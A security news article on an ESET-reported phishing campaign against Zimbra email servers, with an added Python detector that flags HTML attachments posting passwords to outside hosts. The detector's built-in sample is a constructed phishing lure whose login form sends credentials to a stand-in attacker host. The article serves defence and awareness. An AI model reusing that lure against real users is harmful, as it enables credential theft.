Large-Scale Phishing Campaign Targets Zimbra Collaboration Email Servers
Researchers at ESET have identified a large-scale and ongoing phishing campaign targeting Zimbra Collaboration email servers at small- and medium-sized businesses and government agencies. The campaign has been active since at least April and is being conducted globally, with Poland, Ecuador, and Italy the most targeted countries. The campaign does not appear to be aimed at any specific vertical.
Targets are sent an email with an HTML attachment. The email warns the user about an email server update or another Zimbra issue, such as a security update. The From field indicates the email has been sent by an email server administrator. The user is told that they need to download the HTML attachment, which will have a URL pointing to a local file path. The HTML attachment includes the targeted organization’s logo, the organization’s name, and a fake login page with the username prefilled, so the user is only required to enter their password. If the password is entered, the credentials are transmitted by an HTTPS POST request to an adversary-controlled server.
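The attachment pattern described above (a login form with the username prefilled whose submission goes to a host outside the organization) is something a mail gateway or triage script can check for directly. The following is an added example, not code from ESET or from this article: it walks a message's MIME parts, parses each HTML attachment's forms with the standard library, and flags any form that collects a password and posts to a host that is not on the organization's allowlist. The trusted host, the sample message and the attacker host are all constructed placeholders.

```python
"""Added example (not from the ESET research or this article): flag HTML
attachments that carry a credential-harvesting login form, i.e. a form with a
password field whose action posts to a host outside the organization.
All sample data below is constructed for illustration."""
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the organization legitimately signs in to (assumption for the example).
TRUSTED_HOSTS = {"mail.example-org.invalid"}


class _FormScanner(HTMLParser):
    """Collect each <form> action and note password / prefilled text inputs."""

    def __init__(self):
        super().__init__()
        self.forms = []      # one dict per form: action, has_password, prefilled
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "",
                             "has_password": False, "prefilled": False}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            itype = (a.get("type") or "text").lower()
            if itype == "password":
                self._current["has_password"] = True
            elif itype in ("text", "email") and a.get("value"):
                # A username already filled in is the tell described in the article.
                self._current["prefilled"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def suspicious_forms(html, trusted_hosts=TRUSTED_HOSTS):
    """Return forms that collect a password and post to an untrusted host."""
    scanner = _FormScanner()
    scanner.feed(html)
    hits = []
    for f in scanner.forms:
        host = urlparse(f["action"]).hostname or ""
        if f["has_password"] and host and host not in trusted_hosts:
            hits.append({"action_host": host, "prefilled_username": f["prefilled"]})
    return hits


def scan_message(raw):
    """Walk MIME parts of a raw RFC 822 message; report every HTML attachment
    that contains a suspicious form. The message body itself is not scanned,
    since the malicious link lives in the attachment, not the body."""
    msg = message_from_bytes(raw, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.get_content_type() != "text/html":
            continue
        if part.get_content_disposition() != "attachment":
            continue
        charset = part.get_content_charset() or "utf-8"
        html = part.get_payload(decode=True).decode(charset, "replace")
        for hit in suspicious_forms(html):
            findings.append({"filename": part.get_filename(), **hit})
    return findings


def build_sample():
    """Constructed message mirroring the lure described in the article:
    admin-style sender, 'security update' subject, HTML attachment with the
    organization's name, a prefilled username and an external POST target."""
    html = (
        "<html><body><img alt='logo'><h1>Example Org</h1>"
        "<form method='post' action='https://harvest.attacker.invalid/collect'>"
        "<input type='text' name='username' value='alice@example-org.invalid'>"
        "<input type='password' name='password'>"
        "<input type='submit' value='Sign in'></form></body></html>"
    )
    msg = EmailMessage()
    msg["From"] = "Mail Administrator <admin@example-org.invalid>"
    msg["To"] = "alice@example-org.invalid"
    msg["Subject"] = "Mail server security update"
    msg.set_content("Please open the attached file to complete the update.")
    msg.add_attachment(html.encode(), maintype="text", subtype="html",
                       filename="update.html")
    return msg.as_bytes()


if __name__ == "__main__":
    for finding in scan_message(build_sample()):
        print(finding)
```

The check keys on the form's action host rather than on any indicator from the campaign, so it also catches lookalike attachments that use a different harvesting server; a form that posts back to the organization's own Zimbra host produces no finding. In production the allowlist would come from the organization's mail configuration rather than a constant.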
The ESET researchers observed waves of phishing emails being sent from some of the organizations targeted in the campaign, which suggests the threat actor obtained administrator credentials and was able to set up new mailboxes on the server. The researchers suggest that in these cases the same password may have been used for both email and administration. While this email campaign is not particularly sophisticated, it has proven to be effective. Since the HTML attachments contain legitimate code and only one link pointing to a malicious host, and that link is contained in the HTML attachment rather than the message body, the emails may not be detected as malicious and are likely to bypass anti-spam policies, especially since the targeted organizations are mostly small- to medium-sized businesses that are unlikely to have advanced email security defenses. ESET was unable to determine which threat actor is behind the campaign.